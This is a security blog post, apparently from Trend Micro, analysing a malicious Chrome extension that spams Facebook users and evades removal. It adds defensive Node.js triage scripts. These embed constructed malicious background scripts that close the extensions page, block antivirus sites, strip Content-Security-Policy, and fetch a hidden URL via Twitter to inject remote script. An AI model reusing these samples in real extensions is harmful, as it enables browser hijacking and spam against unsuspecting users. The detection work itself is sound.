Malicious browser extensions pose a real security risk: they often lead to system infection and to unwanted spam being posted on Facebook. Based on our data, these attacks have notably affected users in Brazil.
We have previously reported that cybercriminals are placing malicious browser extensions in the official Chrome Web Store. We also came across malware that bypasses a Google security feature which checks third-party extensions. For this blog entry, we performed an in-depth analysis of a malicious Chrome browser extension and its evasion tactics after receiving samples from Facebook. Facebook's security team conducts its own malware research and regularly collaborates with Trend Micro to keep its service safe.
The Ins and Outs of the Browser Plugin
The malicious Chrome extension (detected as BREX_KILIM.LL) is composed of two files, manifest.json and background.js. The manifest.json file tells Chrome to load background.js as the extension's background script:
Figure 1. Two files behind the malicious plugin
The file background.js will execute the following routines:
1. It prevents removal of the malicious extension. If the user opens a tab to chrome://extensions to check for malicious browser extensions, the extension closes that tab immediately.
Figure 2. Code showing the closing of said tab
2. It blocks access to antivirus websites. Any attempt to visit an antivirus vendor's website is blocked.
Figure 3. Code showing the blocking of specific sites
Figure 4. Notification showing access was blocked by the extension
3. It removes a security header from HTTP responses. This header is normally used to prevent cross-site scripting attacks; the extension strips it because it injects script that does not belong to Facebook and would otherwise be blocked by that header.
Figure 5. Code removing portions of the HTTP header
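The three routines above leave recognisable traces in an unpacked extension. The following Node.js script is an added example (not code from the post or from the BREX_KILIM.LL sample) that triages a manifest.json plus its background scripts for exactly those traces. The sample manifest and background script embedded in it are constructed for illustration; the post does not name the header the real sample strips, so Content-Security-Policy is assumed for the sample, and the antivirus domain list is an assumed, deliberately short one.

```javascript
"use strict";

// Assumed: a very partial list of antivirus vendor domains. The post does not
// say which sites the real sample blocks.
const SECURITY_VENDOR_DOMAINS = [
  "trendmicro.com", "kaspersky.com", "avast.com", "symantec.com",
  "mcafee.com", "eset.com", "avg.com",
];

// Constructed sample input (not the real BREX_KILIM.LL files): a manifest and a
// background script exhibiting the three routines described in the post.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: "Video Player Update",
  version: "1.0",
  permissions: ["tabs", "webRequest", "webRequestBlocking", "<all_urls>"],
  background: { scripts: ["background.js"] },
});

const SAMPLE_BACKGROUND = `
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
  if (tab.url && tab.url.indexOf("chrome://extensions") === 0) {
    chrome.tabs.remove(tabId);                                   // routine 1
  }
});
var blocked = ["trendmicro.com", "kaspersky.com", "avast.com"];
chrome.webRequest.onBeforeRequest.addListener(function (d) {
  for (var i = 0; i < blocked.length; i++) {
    if (d.url.indexOf(blocked[i]) !== -1) return { cancel: true }; // routine 2
  }
}, { urls: ["<all_urls>"] }, ["blocking"]);
chrome.webRequest.onHeadersReceived.addListener(function (d) {
  var kept = d.responseHeaders.filter(function (h) {
    return h.name.toLowerCase() !== "content-security-policy";   // routine 3
  });
  return { responseHeaders: kept };
}, { urls: ["*://*.facebook.com/*"] }, ["blocking", "responseHeaders"]);
`;

// Each rule is a predicate over the concatenated background source.
const RULES = [
  {
    id: "closes_extensions_page",
    why: "closes tabs that navigate to chrome://extensions, blocking manual removal",
    test: (src) => /chrome:\/\/extensions/.test(src) && /chrome\.tabs\.remove\s*\(/.test(src),
  },
  {
    id: "blocks_security_vendor_sites",
    why: "cancels web requests to antivirus vendor domains",
    test: (src) => /onBeforeRequest/.test(src) && /cancel\s*:\s*true/.test(src)
      && SECURITY_VENDOR_DOMAINS.some((d) => src.includes(d)),
  },
  {
    id: "strips_response_security_header",
    why: "rewrites response headers and drops a security header (CSP assumed here)",
    test: (src) => /onHeadersReceived/.test(src) && /responseHeaders/.test(src)
      && /content-security-policy|x-frame-options|x-xss-protection/i.test(src),
  },
];

// Permissions that make the three routines possible in the first place.
const RISKY_PERMISSIONS = ["tabs", "webRequest", "webRequestBlocking", "<all_urls>"];

// Triage an unpacked extension: manifestText is the manifest.json contents and
// files maps script file names to their source text. Every background script
// is concatenated before the rules run so a split across files does not hide it.
function triageExtension(manifestText, files) {
  const manifest = JSON.parse(manifestText);
  const scripts = (manifest.background && manifest.background.scripts) || [];
  const missing = scripts.filter((name) => !(name in files));
  const src = scripts.map((name) => files[name] || "").join("\n");
  return {
    backgroundScripts: scripts,
    missingScripts: missing,
    riskyPermissions: (manifest.permissions || []).filter((p) => RISKY_PERMISSIONS.includes(p)),
    findings: RULES.filter((r) => r.test(src)).map((r) => ({ id: r.id, why: r.why })),
  };
}

console.log(JSON.stringify(
  triageExtension(SAMPLE_MANIFEST, { "background.js": SAMPLE_BACKGROUND }), null, 2));
```

The rules are intentionally coarse: any extension that combines webRequestBlocking with response-header rewriting for a site it does not own deserves a manual look, whether or not the exact strings match. Obfuscated samples should be decoded before this runs, since the rules match on plain text.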
To avoid having their extensions detected and removed, the cybercriminals use the following evasion methods:
1. They split the malicious code across multiple script files that work together.
Figure 7. Malicious plugin using multi-script
The malicious behavior is separated into multiple files. If each script file is analyzed independently, the overall malicious behavior may not be spotted, and the files may mistakenly be judged clean.
2. They hex-encode strings, as seen in the screenshot below:
Figure 8. Encoded strings via Hex
After decoding, the strings read as shown below; they are the same values a plain script would contain. Encoding them this way helps the extension evade detection by security products.
Figure 9. Decoded string
3. They use a legitimate domain.
Figure 10. A good domain used by the malicious plugin
4. They use Twitter to hide malicious URLs.
Figure 11. Code communicating with Twitter servers
Figure 12. Twitter profile that houses the URL
5. They use fake file extensions.
Figure 13. The plugin uses .DLL as its supposed extension
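The evasion methods in the list above are each cheap to undo once an analyst has the files. The Node.js script below is an added example (not code from the post or from the BREX_KILIM.LL sample) that reassembles the background scripts in manifest order, decodes hex-encoded string literals, lists the URLs and hosts that become visible, and flags file names whose extension does not match the script being loaded. The two-file sample it embeds is constructed for illustration; the post does not show which hex form the real sample uses, so \xNN escapes and quoted runs of hex digits are both assumed, and the Twitter profile name and .dll file name are placeholders.

```javascript
"use strict";

// Constructed sample (not the real BREX_KILIM.LL files): the behaviour is split
// across two scripts, the URL and file name are stored as \xNN-escaped strings,
// and the second-stage script is fetched under a .dll name. "someprofile" and
// "bg.dll" are placeholders.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2, name: "Flash Update", version: "2.1",
  background: { scripts: ["a.js", "b.js"] },
});
const SAMPLE_FILES = {
  "a.js":
    'var c = "\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x74\\x77\\x69\\x74\\x74\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x2f";\n' +
    'var f = "\\x62\\x67\\x2e\\x64\\x6c\\x6c";',
  "b.js":
    'var x = new XMLHttpRequest(); x.open("GET", c + "someprofile", true);\n' +
    'x.onload = function () { var s = document.createElement("script");\n' +
    '  s.src = x.responseText.trim() + f; document.body.appendChild(s); };\n' +
    'x.send();',
};

// Evasion 1 (multi-script): reassemble every background script in manifest
// order so the files are reviewed together, with a banner marking each start.
function loadBackgroundSource(manifestText, files) {
  const manifest = JSON.parse(manifestText);
  const scripts = (manifest.background && manifest.background.scripts) || [];
  return scripts.map((name) => `// ---- ${name} ----\n${files[name] || "// (missing)"}`).join("\n");
}

// Evasion 2 (hex strings): turn hex-encoded strings back into readable text.
// Handles \xNN escapes and quoted runs of hex digits that decode to printable
// ASCII; an escaped quote inside a literal may break the literal after
// decoding, which is acceptable for reading but not for re-executing.
function decodeHexEscapes(src) {
  let out = src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
  out = out.replace(/(["'])((?:[0-9a-fA-F]{2}){4,})\1/g, (match, quote, hex) => {
    const text = hex.match(/../g).map((b) => String.fromCharCode(parseInt(b, 16))).join("");
    return /^[\x20-\x7e]+$/.test(text) ? quote + text + quote : match;
  });
  return out;
}

// Evasion 4 (URLs hidden behind a legitimate service): list the URLs that are
// visible once decoded. URLs assembled at runtime by concatenation, as in
// b.js above, still need dynamic analysis or manual tracing.
function extractUrls(src) {
  return [...new Set(src.match(/https?:\/\/[^\s"'`)]+/g) || [])];
}

// Evasion 5 (fake extensions): string literals naming files whose extension
// says "not a script"; in code that loads scripts, a .dll or image name is
// worth a second look.
function findDisguisedFiles(src) {
  const hits = src.match(/["'][^"'\s]+\.(?:dll|exe|txt|png|jpg|gif)["']/gi) || [];
  return [...new Set(hits.map((h) => h.slice(1, -1)))];
}

function analyzeExtension(manifestText, files) {
  const decoded = decodeHexEscapes(loadBackgroundSource(manifestText, files));
  const urls = extractUrls(decoded);
  return {
    decoded,
    urls,
    hosts: [...new Set(urls.map((u) => new URL(u).hostname))],
    disguisedFiles: findDisguisedFiles(decoded),
  };
}

console.log(JSON.stringify(analyzeExtension(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

The decoded output is what should be fed to signature or rule matching; a host such as twitter.com showing up in an extension that has no business talking to Twitter is the indicator, not the domain's reputation.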
Infections and Protection
Based on our data from May 2014 onward, Trend Micro HouseCall has helped about 1,000,000 users whose computers were infected by malicious browser extensions. The most affected countries are mostly in Latin America, such as Brazil, Mexico, Colombia, and Peru.
Figure 14. Top affected countries
We strongly advise users to avoid clicking links in messages, even when they appear to come from friends. Users can also use Trend Micro HouseCall to secure their systems against online threats, including those that leverage or abuse Facebook. Trend Micro and Facebook are working closely together to combat this threat.
Below is the SHA1 hash of the malicious file: